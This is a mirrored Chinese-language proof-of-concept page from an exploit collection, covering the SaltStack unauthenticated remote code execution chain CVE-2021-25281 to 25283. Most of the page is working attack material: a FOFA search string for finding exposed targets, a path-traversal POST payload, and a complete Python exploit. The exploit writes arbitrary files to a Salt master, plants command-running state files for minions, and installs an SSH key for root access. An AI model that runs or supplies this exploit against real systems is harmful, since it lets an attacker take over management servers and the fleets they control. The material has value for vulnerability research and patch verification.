mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
182 lines
5.9 KiB
Markdown
182 lines
5.9 KiB
Markdown
|
|
# Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
SaltStack套件是政企机构 IT运维管理人员常用的管理工具,利用这些漏洞,最严重情形可导致未授权远程代码执行。
|
|||
|
|
|
|||
|
|
- CVE-2021-25281:salt-api wheel_async未授权访问
|
|||
|
|
|
|||
|
|
- CVE-2021-25283:sdb rest插件模版渲染问题
|
|||
|
|
|
|||
|
|
- CVE-2021-25282:wheel/pillar_roots.py文件任意写漏洞 (
|
|||
|
|
|
|||
|
|
参考链接:
|
|||
|
|
|
|||
|
|
- https://mp.weixin.qq.com/s/iu4cS_DZTs0sVVg92RBe4Q
|
|||
|
|
- https://mp.weixin.qq.com/s/QvQoTuQJVthxS07pbLWJmg
|
|||
|
|
- https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/
|
|||
|
|
- https://dozer.nz/posts/saltapi-vulns
|
|||
|
|
- https://github.com/Immersive-Labs-Sec/CVE-2021-25281
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Saltstack 3002.2之前的所有版本
|
|||
|
|
SaltStack =< 3002.2
|
|||
|
|
SaltStack =< 3001.4
|
|||
|
|
SaltStack =< 3000.6
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
app="SALTSTACK-产品"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
CVE-2021-25281 + CVE-2021-25282 poc:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
http://target/run
|
|||
|
|
POST:
|
|||
|
|
"client": "wheel_async",
|
|||
|
|
"fun": "pillar_roots.write",
|
|||
|
|
"data": "../../../../../tmp/test2",
|
|||
|
|
"path": "../../../../../tmp/test2",
|
|||
|
|
"username": "password",
|
|||
|
|
"password": "username",
|
|||
|
|
"eauth": "pam"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
CVE-2021-25281.py:
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
# Copyright (C) 2021 Alex Seymour, Immersive Labs
|
|||
|
|
# https://github.com/Immersive-Labs-Sec/CVE-2021-25281
|
|||
|
|
#
|
|||
|
|
# Permission is hereby granted, free of charge, to any person obtaining a copy
|
|||
|
|
# of this software and associated documentation files (the "Software"), to deal
|
|||
|
|
# in the Software without restriction, including without limitation the rights
|
|||
|
|
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|||
|
|
# copies of the Software, and to permit persons to whom the Software is
|
|||
|
|
# furnished to do so, subject to the following conditions:
|
|||
|
|
|
|||
|
|
# The above copyright notice and this permission notice shall be included in all
|
|||
|
|
# copies or substantial portions of the Software.
|
|||
|
|
|
|||
|
|
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|||
|
|
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|||
|
|
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|||
|
|
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|||
|
|
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|||
|
|
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
|||
|
|
# SOFTWARE.
|
|||
|
|
from argparse import ArgumentParser, Namespace
|
|||
|
|
from pathlib import Path
|
|||
|
|
from secrets import token_hex
|
|||
|
|
from textwrap import dedent
|
|||
|
|
|
|||
|
|
import requests
|
|||
|
|
import urllib3
|
|||
|
|
|
|||
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|||
|
|
|
|||
|
|
|
|||
|
|
def read_file(file_path: Path):
|
|||
|
|
try:
|
|||
|
|
with file_path.open() as handle:
|
|||
|
|
return handle.read()
|
|||
|
|
except OSError:
|
|||
|
|
print(f'[-] Cannot read file {file_path}')
|
|||
|
|
exit(1)
|
|||
|
|
|
|||
|
|
|
|||
|
|
def send_request(url: str, path: str, data: str):
|
|||
|
|
path = path[1:] if path.startswith('/') else path
|
|||
|
|
url = f'https://{url}/run' if not url.startswith(('http', 'https')) else f'{url}/run'
|
|||
|
|
try:
|
|||
|
|
response = requests.post(
|
|||
|
|
url,
|
|||
|
|
verify=False,
|
|||
|
|
json={
|
|||
|
|
'eauth': 'auto',
|
|||
|
|
'client': 'wheel_async',
|
|||
|
|
'fun': 'pillar_roots.write',
|
|||
|
|
'data': data,
|
|||
|
|
'path': f'../../../../../../{path}',
|
|||
|
|
},
|
|||
|
|
)
|
|||
|
|
except requests.RequestException:
|
|||
|
|
print(f'[-] Failed to send request to {url}')
|
|||
|
|
exit(1)
|
|||
|
|
|
|||
|
|
if json := response.json():
|
|||
|
|
print(f'[+] Got JID: {json["return"][0]["jid"]}, the job was queued successfully')
|
|||
|
|
else:
|
|||
|
|
print('[-] No JID was returned, the request may have failed or the target is not vulnerable')
|
|||
|
|
|
|||
|
|
|
|||
|
|
def handle_write_file(args: Namespace):
|
|||
|
|
if args.file:
|
|||
|
|
file_contents = read_file(args.file)
|
|||
|
|
elif args.data:
|
|||
|
|
file_contents = args.data
|
|||
|
|
else:
|
|||
|
|
print('[-] Either file or data is required')
|
|||
|
|
exit(1)
|
|||
|
|
|
|||
|
|
print('[+] Attempting to write file')
|
|||
|
|
send_request(args.target, args.path, file_contents)
|
|||
|
|
|
|||
|
|
|
|||
|
|
def handle_state_file(args: Namespace):
|
|||
|
|
state_file_path = Path('/srv') / 'salt' / f'{token_hex(16)}.sls'
|
|||
|
|
file_contents = dedent(f"""\
|
|||
|
|
'{args.cmd}':
|
|||
|
|
cmd.run
|
|||
|
|
""")
|
|||
|
|
|
|||
|
|
print(f'[+] Attempting to write command to {state_file_path} state file')
|
|||
|
|
send_request(args.target, f'/srv/salt/{state_file_path.name}', file_contents)
|
|||
|
|
|
|||
|
|
|
|||
|
|
def handle_ssh_key(args: Namespace):
|
|||
|
|
public_key = read_file(args.public_key)
|
|||
|
|
|
|||
|
|
print(f'[+] Attempting to write an authorized key for user {args.user}')
|
|||
|
|
if args.user == 'root':
|
|||
|
|
send_request(args.target, '/root/.ssh/authorized_keys', public_key)
|
|||
|
|
else:
|
|||
|
|
send_request(args.target, f'/home/{args.user}/.ssh/authorized_keys', public_key)
|
|||
|
|
|
|||
|
|
|
|||
|
|
def main():
|
|||
|
|
parser = ArgumentParser()
|
|||
|
|
parser.add_argument('target', help='The URL of the target Salt master')
|
|||
|
|
subparsers = parser.add_subparsers()
|
|||
|
|
|
|||
|
|
write_parser = subparsers.add_parser('write', help='Write data to a file on the master')
|
|||
|
|
write_parser.add_argument('path', help='The file path to write to on the target')
|
|||
|
|
write_parser.add_argument('-f', '--file', type=Path, help='A file to upload to the target')
|
|||
|
|
write_parser.add_argument('-d', '--data', help='The raw contents to write to a file')
|
|||
|
|
write_parser.set_defaults(func=handle_write_file)
|
|||
|
|
|
|||
|
|
state_parser = subparsers.add_parser('state', help='Create a state file to try and run commands on minions')
|
|||
|
|
state_parser.add_argument('cmd', help='A command to add to a new state file')
|
|||
|
|
state_parser.set_defaults(func=handle_state_file)
|
|||
|
|
|
|||
|
|
ssh_parser = subparsers.add_parser('ssh', help='Write an SSH key to try and gain remote access to the master')
|
|||
|
|
ssh_parser.add_argument('public_key', type=Path, help='A file containing the public key to upload')
|
|||
|
|
ssh_parser.add_argument('-u', '--user', default='root', help='The user on the target to try and upload the key to')
|
|||
|
|
ssh_parser.set_defaults(func=handle_ssh_key)
|
|||
|
|
|
|||
|
|
args = parser.parse_args()
|
|||
|
|
args.func(args)
|
|||
|
|
|
|||
|
|
|
|||
|
|
if __name__ == '__main__':
|
|||
|
|
main()
|
|||
|
|
```
|
|||
|
|
|